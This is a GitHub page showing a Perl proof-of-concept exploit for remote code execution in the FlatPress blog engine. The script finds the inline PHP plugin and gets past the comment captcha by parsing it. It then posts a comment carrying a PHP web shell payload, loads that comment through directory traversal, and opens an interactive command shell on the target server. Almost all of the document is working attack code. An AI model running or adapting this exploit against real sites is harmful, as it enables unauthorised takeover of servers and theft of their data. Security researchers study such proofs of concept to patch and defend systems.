-
-
Notifications
You must be signed in to change notification settings - Fork 25
/
flatpress-rce.pl
executable file
·91 lines (86 loc) · 3.28 KB
/
flatpress-rce.pl
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
#!/usr/bin/perl
# Flatpress remore code execution PoC
# Blended threat, executes code injected into comment
# by loading comment as a page through directory traversal
# Written by @Wireghoul - justanotherhacker.com
use strict;
use warnings;
use LWP::UserAgent;
&banner;
&usage if (!$ARGV[0]);
my $injid = 'Spl0ited'.int(rand(9999));
my $ua = LWP::UserAgent->new;
$ua->timeout(10);
$ua->env_proxy;
$ua->cookie_jar({ file => "tmp/flatpress-rce.txt" });
sub banner {
print "\nFlatpress remote code execution PoC by \@Wireghoul\n";
print "=======================[ justanotherhacker.com]==\n";
}
sub usage {
print "Usage: $0 <url>\n";
exit;
}
my $response = $ua->get("$ARGV[0]/fp-plugins/inlinephp/plugin.inlinephp.php");
if (!$response->is_success) {
print "[-] Inline PHP plugin not found at $ARGV[0]/fp-plugins/inlinephp/plugin.inlinephp.php\n";
} else {
print "[+] Inline PHP plugin found, hopefully it is enabled!\n";
}
# Prepare for exploitation, find entry + comment location
$response = $ua->get($ARGV[0]);
if ($response->is_success) {
if ($response->decoded_content =~ /(http.*?x=entry:entry.*?;comments:1#comments)/) {
my $cmntlink = $1;
print "[+] Found comment link: $cmntlink\n";
my $aaspam = 0; # Can't be bothered solving easy captchas, just reload page until we get one we like
while ($aaspam == 0) {
$response = $ua->get($cmntlink);
if ($response->decoded_content =~ /<strong>(\d+) plus (\d+) \? \(\*\)/) {
$aaspam = $1+$2;
print "[+] Defeated antispam $1 + $2 = $aaspam\n";
} else {
$response->decoded_content =~ m/<strong>(.*) \? \(\*\)/;
print "[*] Unknown antispam: $1 ... retrying\n";
}
}
# Post a comment
$response = $ua->post(
$cmntlink."form",
Content => {
'name' => $injid,
'email' => '',
'url' => '',
'aaspam' => $aaspam,
'content' => "SHELL[exec]system(\$_GET['cmd']);[/exec]LLEHS",
'submit' => 'Add',
}
);
$response = $ua->get($cmntlink);
# Find link to injected content, then execute psuedo shell in loop
my @cmnts = split (/<li id="comment/, $response->decoded_content);
my @injected = grep /$injid/, @cmnts;
if ($injected[0] =~ /$injid/) {
print "[+] Injection ($injid) successful\n";
$injected[0] =~ m/(http.*?)x=entry:entry(\d\d)(\d\d)(\d\d-\d+);comments:1#comment(\d+-\d+)/;
my $shell="$1page=../../content/$2/$3/entry$2$3$4/comments/comment$5";
print "[*] Dropping into shell, type exit to exit\n";
my $line='';
while (1) {
print '$';
$line=<STDIN>;
if ($line =~ /^exit$/) { exit; };
my $output=$ua->get("$shell&cmd=$line");
$output->decoded_content =~ /SHELL(.*)LLEHS/ms;
my $clean = $1; $clean =~ s/<br \/>//g;
print "$clean\n";
}
} else {
print '[-] Unable to identify the injection point';
}
} else {
print "[-] Comment link not found\n";
}
} else {
die $response->status_line;
}